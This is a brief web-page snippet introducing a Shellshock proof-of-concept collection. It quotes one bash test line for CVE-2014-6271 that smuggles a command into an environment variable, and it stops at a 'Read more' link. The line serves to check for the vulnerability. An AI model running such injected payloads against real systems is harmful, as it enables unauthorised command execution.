Shellshocker Proof of Concept collection

Command Line (Linux, OSX, and Windows via Cygwin) bashcheck – script to test for the latest vulns CVE-2014-6271 env X='() { :; }; echo “CVE-2014-6271 vulnerable”‘ bash -c id CVE-2014-7169 will create a file named Read more

1 2